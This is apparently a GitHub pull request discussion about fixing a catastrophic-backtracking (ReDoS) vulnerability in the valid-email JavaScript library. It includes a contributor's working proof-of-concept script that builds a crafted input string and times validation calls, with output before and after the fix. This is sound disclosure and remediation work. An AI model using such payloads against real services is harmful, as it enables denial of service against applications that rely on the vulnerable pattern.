### PR TITLE
Fix Potential Catastrophic Backtracking Vunerability

### PR DESCRIPTION
**Pull request by davisjam**
- Incorporates the tests from @radiovisual
- Fixes REDOS in #4 

Because I changed the behavior of the pattern, this should be released with a new major version number.

### CODE REVIEW

**Comment by davisjam** [comment]
@johnhenry

**Comment by davisjam** [comment]
@johnhenry If you merge #6 I'll fix these conflicts.

**Comment by johnhenry** [comment]
@davisjam Let's address one issue at a time.
I see three issues that you are trying to address in this pull request:
 - The venerability mentioned here: https://github.com/johnhenry/valid-email/issues/4
 - Tests from the issue here: https://github.com/johnhenry/valid-email/issues/1
 - Linting/Formating

As for the first issue, I've incorporated the substantiative change -- updating regular expression to fix the vulnerability -- along with some formatting to if statements, into this branch:
https://github.com/johnhenry/valid-email/tree/fix-catastrophic-backtracking-vunerability ,

Upon testing them, I don't see the same results you claim, so I'm weary to incorporate your fix at this point.

Can you please provide evidence that this is a venerability by:
1) showing that there is venerability by using a test with timing functions such as console.time/console.timeEnd to demonstrate catastrophic backtracking. (You mentioned that a test took 10 seconds to run on your machine, but when I ran a similar test, it took ~1.8 milliseconds.)
2) demonstrating that your code fixes it. (Running the code from the aforementioned branch seems to reduce the time by ~1 milliseconds, but this could be due to a number of factors.)

As for the second issue, i'm not going to incorporate these test. I think this is a non-issue for reasons outlined on that issue when I closed it. This works for most situations and I've recently added a lengthy note on accuracy to the readme as a warning.  In addition addressing issues may lead to unforeseen consequences that break the application when it's been working just for some people, So unless 
there's a good reason, like a proven security venerability as mentioned above, i'm hesitant to make changes. 

On another note, I'm not a fan of the ava testing framework. I much prefer [tape](https://github.com/substack/tape). Even if the tests were written with tape, I wouldn't be inclined to add them to the library as they are just testing for know false negatives and not whether or not the program is working as it should. Though, perhaps I should list some know false negatives in the readme section on accuracy -- what do you think?

As for the third issue, I'm not going to incorporate linting into this project because it's such a small project. As for other changes, I don't think that there's much value in declaring constants in that are used so few times in such a small project -- I'm actually inclined to get rid of the ones that are there. 

I did notice that you added a type error when not passing a string -- we could have discussion about type-safety and what _should_ happen when the wrong type is passed into to a function when using a dynamic language, but as a concession, I've added a check for truthiness that will at least catch falsy objects.  Were I worried about type safety, I'd incorporate flow or typescript, but this is a simple enough project such that is overkill. If someone really wants to pass in something other than a string at this point... sure I'm down, let's see what happens!

Could you address my comments concerning the first issue and make a pull request based on that branch?

**Comment by davisjam** [comment]
@johnhenry 

I added the test suite in part to make it easy to demonstrate the attack -- that's what the 'REDOS' test does. I'm not much bothered about which test library is used. I just pulled the changes from @radiovisual because they were already done.

Since there is some confusion about whether or not there is actually a security risk, here is a standalone attack script. Note the limit of 9 pumps is because of the existing length test on the user portion of the string.

```
(15:42:44) jamie@woody /tmp/valid-email $ cat standalone-attack.js 
var validEmail = require('.');	
	
// Prepare attack string.
const pump = "\\\\a\\\\\\a";
let attackString = '';
for (let i = 0; i < 9; i++) {
	attackString += pump;
}
attackString += '\v';

const badEmail = `${attackString}@gmail.com`;

// Make a number of failed calls. This shouldn't take too long.
const start = process.hrtime();
for (let i = 0; i < 20; i++) {
	validEmail(badEmail);
}
const end = process.hrtime(start);

console.log(`20 calls took ${end[0]} seconds`);
```

and demo:

```
(15:42:39) jamie@woody /tmp/valid-email $ git branch
  DevDependencies
  TestAndFixREDOS
  fix-catastrophic-backtracking-vunerability
* master
(15:42:40) jamie@woody /tmp/valid-email $ node standalone-attack.js 
20 calls took 2 seconds
```

The vulnerability is fixed in your branch that incorporated my fix:

```
(15:44:24) jamie@woody /tmp/valid-email $ git branch
  DevDependencies
  TestAndFixREDOS
* fix-catastrophic-backtracking-vunerability
  master
(15:44:27) jamie@woody /tmp/valid-email $ node standalone-attack.js 
20 calls took 0 seconds
```

**Comment by davisjam** [comment]
@johnhenry I hope #7 will be more to your liking.

**Comment by johnhenry** [comment]
Thanks @davisjam for your help. I'm gonna go ahead and close this as i've incorporated changes on another branch.

**Pull request closed without merging**
